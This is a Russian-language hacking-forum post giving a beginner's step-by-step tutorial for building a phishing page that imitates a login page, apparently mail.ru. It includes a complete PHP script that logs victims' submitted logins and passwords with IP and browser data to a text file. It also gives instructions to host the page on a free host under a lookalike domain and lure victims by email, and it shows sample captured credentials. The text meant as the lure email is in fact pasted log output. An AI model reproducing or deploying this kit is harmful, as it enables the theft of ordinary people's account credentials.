лужнофф
Сообщений: 281
Оценки: 0
Присоединился: 2011-02-14 15:19:56.986666
|
Опишу универсальный способ создания фэйков. По шагам, все будет понятно даже для ламеров. Тут даже хтмл и пхп не нужно знать.
Заходим на страницу, которую мы пытаемся подделать (очевидно, это страница логина). Теперь нам нужно скачать ее. Делается двумя способами.
1. способ (ламерский). Нажимаем ctrl+s в браузере на этой странице (или в меню Файл - сохранить как… сохраняете страницу на своем кампе. Если после заливки на сервак не будут грузиться картинки - поправляйте (как это делать, я рассказывать не буду, ибо догадается даже олигофрен). Преимущества этого способа - все что нужно сделать, это нажать 3 кнопки и готово.
2. способ (чуть сложнее, но чище). Нажимаем ctrl+u (в лисе), ctrl+F3 (в опере) или в меню "Вид - Исходный код страницы" (в осле). Открывается окно с исходным кодом страницы. Этот код вы копируете в файл index.php или index.HТМL. Потом прописываем абсолютные пути ко всем картинкам и таблицам стилей (оригинальным). Это чтобы картинки и ЦССки грузились с сервака, страницу которого мы подделываем. Преимущества этого способа перед первым: все чисто, все компактненько в одном файле.
Открываем блокнотом (или др. редактором исходного кода) ваш получившийся файл, ищем теги <form></form>, имеющие отношение к форме логина (иногда на странице бывает несколько форм) и меняем значение аттрибута action на submit.php. Если вы не разбираетесь в HТМL, найдите слово action и то, чему оно должно быть равно, установите submit.php (чтобы получилось примерно следующее: action="submit.php"). Сохраняем файл, закрываем.
В той же папке создаем файл submit.php и вписываем туда следующее содержимое:
<?php
/**
* @author hackersoft
* @copyleft 2009
*/
@include 'config.php';
$req=array(
'HTTP_REFERER'=>$_SERVER['HTTP_REFERER'],
'HTTP_USER_AGENT'=>$_SERVER['HTTP_USER_AGENT'],
'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'],
'REMOTE_PORT'=>$_SERVER['REMOTE_PORT'],
'REQUEST_URI'=>$_SERVER['REQUEST_URI'],
'REQUEST_TIME'=>$_SERVER['REQUEST_TIME'],
);
$desc=fopen('logs.txt','at+');
fwrite($desc,print_r($req,true)."\n\n\n".print_r($_REQUEST,true)."\n\n\n=====================\n\n\n");
fclose($desc);
header('Location: '.$loc);
?>
(не забудьте адрес поменять на нужный). Сохраняем и закрываем.
Создаем пустой файл logs.txt.
Ну вот, фейк готов, теперь его осталось залить и впарить жертве. Для этого регим акк на сайте http://freehostia.com (бесплатный хостер с пхп без баннеров). Называем сайт как-нибудь типа mai1-ru-.freehostia.com.
Заливаем по FTP (или через панель управления) те файлы, которые вы создали.
Установите на файл logs.txt привилегии "777" (ибо пароль жертвы не запишется).
Теперь фейк можно впарить жертве. Напишите письмо вида:
Цитата:
Array
(
[HTTP_REFERER] => http://hackersoft.ru/admin/
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
[REMOTE_ADDR] => 92.112.88.666
[REMOTE_PORT] => 34953
[REQUEST_URI] => /admin/?action=articles
[REQUEST_TIME] => 1230097894
)
Array
(
[login] => (здесь логин маши)
[password] => (а здесь пароль)
)
===================== Вот вроде бы и все. Если возникнут вопросы писать в этот топик.
|
Обещанная статья по фэикам. - 
